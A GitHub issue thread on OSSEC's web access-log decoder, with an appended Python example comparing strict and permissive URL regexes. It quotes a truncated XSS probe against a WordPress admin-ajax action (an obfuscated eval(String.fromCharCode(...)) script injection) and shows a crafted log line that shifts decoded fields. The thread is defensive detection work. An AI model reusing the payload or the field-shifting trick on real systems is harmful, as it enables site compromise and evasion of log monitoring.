Open colinmollenhour opened 8 years ago
I second this. Using (\.+) instead of (\S+) will allow us to decode requests like this:
EDIT: Even with (\.+), OSSEC still does not match the request below.
http://domain.com/wp-admin/admin-ajax.php?action=update_zb_fbc_code&domain=</script><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59, 118, 97, 114, 32, 115, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, ..., 41, 59, 10, 125));</script>
Right now those requests end in a level 13 alert:
Rule: 1003 fired (level 13) -> "Non standard syslog message (size too large)."
While this is an edge case that is not representative of normal web requests, there are requests that may be logged by the web server that are not matched by the current decoder. The cases I've seen are triggered by security scanners/sniffers, which are arguably the most important requests to match, since OSSEC cannot take proper action if it cannot match the right decoder.
Example from an nginx log:
This results in an alert:
I added a decoder to local_decoders.xml which does match the request:
However, I think that this change should be made in the "web-accesslog" decoder directly. Specifically, the "\S+" used to match the url should be ".+" to allow spaces in the url.
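The following is an added example, not code from the issue or from the OSSEC project, that models the two decoder variants argued about in this thread (a URL field matched with \S+ versus one that accepts any character) and the separate size-limit alert. OSSEC's OS_Regex is not PCRE: there \S is "non-space" and \. is "any character" (an unescaped dot is a literal dot), so the commenter's (\.+) corresponds to Python's (.+). The regexes below only mirror the field layout of a web access-log decoder (source ip, method, url, status id); they are not the stock decoder's text, and the prematch a real decoder also carries is not modelled. The log lines are constructed, and MAX_SYSLOG_SIZE is an assumed value standing in for the maxsize attribute of rule 1003 ("Non standard syslog message (size too large)"); check the real figure in your syslog_rules.xml.

```python
import re

# Constructed sample nginx access-log lines (combined format), illustrative only.
NORMAL = ('203.0.113.7 - - [10/Oct/2016:13:55:36 +0000] '
          '"GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"')
# Scanner-style request: the XSS probe puts a space inside the URL.
SCANNER = ('198.51.100.9 - - [10/Oct/2016:13:55:37 +0000] '
           '"GET /wp-admin/admin-ajax.php?d=</script><script language=javascript>'
           'eval(1)</script> HTTP/1.1" 400 0 "-" "scanner/1.0"')
# Same request with a payload long enough to exceed the assumed syslog size limit.
HUGE = SCANNER.replace("eval(1)", "eval(" + ",".join(["0"] * 600) + ")")
# Constructed line where the User-Agent imitates the end of a request line.
# Assumes the server logged the quote unescaped; nginx and Apache escape quotes
# in logged fields by default, so this illustrates the regex risk, not a known bypass.
FORGED = ('198.51.100.9 - - [10/Oct/2016:13:55:38 +0000] '
          '"GET /a b HTTP/1.1" 404 0 "-" "evil HTTP/1.1" 200 "')

# Python counterparts of the two decoder variants.  OSSEC '\S+' == Python '\S+',
# OSSEC '\.+' (any character, one or more) == Python '.+'.
STRICT = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) HTTP/\S+" (\d+) ')
LOOSE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (.+) HTTP/\S+" (\d+) ')

# Assumed size limit standing in for rule 1003's maxsize; verify in syslog_rules.xml.
MAX_SYSLOG_SIZE = 1025


def decode(line, pattern):
    """Return the decoded fields, or None when the pattern does not match."""
    m = pattern.match(line)
    if m is None:
        return None
    return {"srcip": m.group(1), "method": m.group(2),
            "url": m.group(3), "id": m.group(4)}


def classify(line, pattern):
    """Simplified model of what the thread observed: an oversized line ends in the
    size alert no matter how permissive the URL regex is; otherwise the decoder
    either matches or the line stays undecoded.  This models the observed outcome,
    not analysisd's internal evaluation order."""
    if len(line) > MAX_SYSLOG_SIZE:
        return "rule 1003: size too large"
    fields = decode(line, pattern)
    if fields is None:
        return "no decoder matched"
    return "web-log: %s %s -> %s" % (fields["method"], fields["url"], fields["id"])


if __name__ == "__main__":
    for name, line in [("normal", NORMAL), ("scanner", SCANNER),
                       ("huge", HUGE), ("forged", FORGED)]:
        print(name, "strict:", classify(line, STRICT))
        print(name, "loose: ", classify(line, LOOSE))
```

Two things to take from running it. First, the loose pattern is what makes the scanner line decodable at all, while the oversized line is lost before any decoder choice matters, which is consistent with the EDIT in the first comment. Second, a greedy any-character URL field moves the decision about where the URL ends to the right-hand anchor (HTTP/\S+" \d+): on the FORGED line the decoded status becomes 200 instead of 404, so whoever controls a later field such as the User-Agent can shift field boundaries if the server does not escape quotes. If the decoder's prematch also uses \S+ for the URL, it has to be relaxed as well, or the regex is never reached.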